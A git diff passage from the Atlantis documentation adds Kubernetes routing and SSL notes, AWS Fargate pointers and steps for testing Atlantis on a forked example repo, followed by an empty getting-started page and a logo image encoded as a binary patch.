targetPort: 4141 + selector: + app: atlantis +``` +
+
+### Routing and SSL
+The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
+Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
+to GitHub/GitLab and your internal users.
+
+If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
+certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
+You could also set up SSL at your LoadBalancer.
+
+## AWS Fargate
+
+If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
+
+## Testing Out Atlantis on GitHub
+
+If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
+
+- Fork https://github.com/runatlantis/atlantis-example
+- If you didn't add the Webhook to your organization, add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
+- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
+  - Click **Branches** on your forked repo's homepage
+  - click the **New pull request** button next to the `example` branch
+  - Change the `base` to `{your-repo}/master`
+  - click **Create pull request**
+- Now you can test out Atlantis
+  - Create a comment `atlantis help` to see what commands you can run from the pull request
+  - `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
+  - `atlantis apply` will run `terraform apply`. 
Since our pull request creates a `null_resource` (which does nothing) this is safe to do. \ No newline at end of file diff --git a/runatlantis.io/docs/getting-started.md b/runatlantis.io/docs/getting-started.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/runatlantis.io/docs/images/atlantis-logo.png b/runatlantis.io/docs/images/atlantis-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..748e26771af638c3dea9a2c31626213b7e43bf38 GIT binary patch literal 14750 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
?j!w~p_FtN}fvxaiB>Yg&OXe@WVL{ND8c`Y$94 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 